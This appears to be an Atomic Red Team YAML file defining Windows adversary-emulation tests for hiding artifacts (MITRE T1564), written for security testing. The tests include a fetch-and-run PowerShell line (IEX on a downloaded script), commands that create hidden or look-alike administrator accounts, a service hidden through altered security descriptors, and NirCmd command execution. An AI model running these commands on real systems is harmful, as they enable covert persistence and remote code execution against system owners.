security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
python_conversion
atomic-red-team/atomics/T1564/T1564.yaml
T
Carrie Roberts d4709021fb Handle spaces in file paths (#2535) 
* updating atomics count in README.md [ci skip]

* wip

* handle spaces in path

* update readme

* fix typo

---------

Co-authored-by: publish bot <opensource@redcanary.com>
2023-09-22 10:47:25 -06:00

128 lines
6.0 KiB
YAML
Raw Permalink Blame History

attack_technique: T1564
display_name: "Hide Artifacts"
atomic_tests:
- name: Extract binary files via VBA
auto_generated_guid: 6afe288a-8a8b-4d33-a629-8d03ba9dad3a
description: |
This module extracts a binary (calc.exe) from inside of another binary.
In the wild maldoc authors will use this technique to hide binaries inside of files stored
within the office document itself. An example of this technique can be seen in sample
f986040c7dd75b012e7dfd876acb33a158abf651033563ab068800f07f508226
This sample contains a document inside of itself. Document 1 is the actual maldoc itself, document 2
is the same document without all the malicious code. Document 1 will copy Document 2 to the file system
and then "peek" inside of this document and pull out the oleObject.bin file. Contained inside of this
oleObject.bin file is a payload that is parsed out and executed on the file system.
supported_platforms:
- windows
dependency_executor_name: powershell
dependencies:
- description: |
Microsoft Word must be installed
prereq_command: |
try {
New-Object -COMObject "Word.Application" | Out-Null
Stop-Process -Name "winword"
exit 0
} catch { exit 1 }
get_prereq_command: |
Write-Host "You will need to install Microsoft Word manually to meet this requirement"
executor:
command: |
$macro = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1564\src\T1564-macrocode.txt")
$macro = $macro -replace "aREPLACEMEa", "PathToAtomicsFolder\T1564\bin\extractme.bin"
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroCode "$macro" -officeProduct "Word" -sub "Extract" -NoWrap
cleanup_command: |
Remove-Item "$env:TEMP\extracted.exe" -ErrorAction Ignore
name: powershell
- name: Create a Hidden User Called "$"
auto_generated_guid: 2ec63cc2-4975-41a6-bf09-dffdfb610778
description: Creating a user with a username containing "$"
supported_platforms:
- windows
executor:
name: command_prompt
elevation_required: true
command: net user $ ATOMIC123! /add /active:yes
cleanup_command: net user $ /DELETE 2>&1
- name: Create an "Administrator " user (with a space on the end)
auto_generated_guid: 5bb20389-39a5-4e99-9264-aeb92a55a85c
description: Creating a user with a username containing with a space on the end
supported_platforms:
- windows
executor:
name: powershell
elevation_required: true
command: New-LocalUser -Name "Administrator " -NoPassword
cleanup_command: Remove-LocalUser -Name "Administrator " 2>&1 | out-null
- name: Create and Hide a Service with sc.exe
auto_generated_guid: 333c7de0-6fbe-42aa-ac2b-c7e40b18246a
description: |
The following technique utilizes sc.exe and sdset to change the security descriptor of a service and "hide" it from Get-Service or sc query.
Upon successful execution, sc.exe creates a new service changes the security descriptor.
https://twitter.com/Alh4zr3d/status/1580925761996828672
https://learn.microsoft.com/en-us/windows/win32/secauthz/security-descriptor-string-format
supported_platforms:
- windows
input_arguments:
service_name:
description: Name of service to create
type: string
default: AtomicService
executable_command:
description: Command to execute as a service
type: string
default: 'C:\Windows\System32\calc.exe'
executor:
command: |
sc.exe create #{service_name} binPath= "#{executable_command}"
sc sdset #{service_name} "D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
cleanup_command: |
sc sdset #{service_name} "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
sc.exe delete #{service_name}
name: command_prompt
elevation_required: true
- name: Command Execution with NirCmd
auto_generated_guid: 2748ab4a-1e0b-4cf2-a2b0-8ef765bec7be
description: |
NirCmd is used by threat actors to execute commands, which can include recon and privilege escalation via running commands via the SYSTEM account
See https://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis
supported_platforms:
- windows
input_arguments:
nircmd_location:
description: Location of nircmd executable
type: Path
default: PathToAtomicsFolder\..\ExternalPayloads\nircmd.exe
command_to_execute:
description: Command for nircmd to execute
type: Path
default: win child class "Shell_TrayWnd" hide class "TrayClockWClass"
cleanup_command_to_execute:
description: Cleanup command to undo the arbitrary command ran by nircmd
type: Path
default: win child class "Shell_TrayWnd" show class "TrayClockWClass"
dependency_executor_name: powershell
dependencies:
- description: |
The Nircmd executable must exist at (#{nircmd_location})
prereq_command: |
if (Test-Path "#{nircmd_location}") {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
invoke-webrequest "https://www.nirsoft.net/utils/nircmd-x64.zip" -outfile "PathToAtomicsFolder\..\ExternalPayloads\nircmd.zip"
expand-archive -path "PathToAtomicsFolder\..\ExternalPayloads\nircmd.zip" -destinationpath "PathToAtomicsFolder\..\ExternalPayloads\"
executor:
command: |
cmd /c "#{nircmd_location}" #{command_to_execute}
cleanup_command: |
cmd /c "#{nircmd_location}" #{cleanup_command_to_execute} -erroraction silentlycontinue | out-null
name: powershell
elevation_required: false
Reference in New Issue View Git Blame Copy Permalink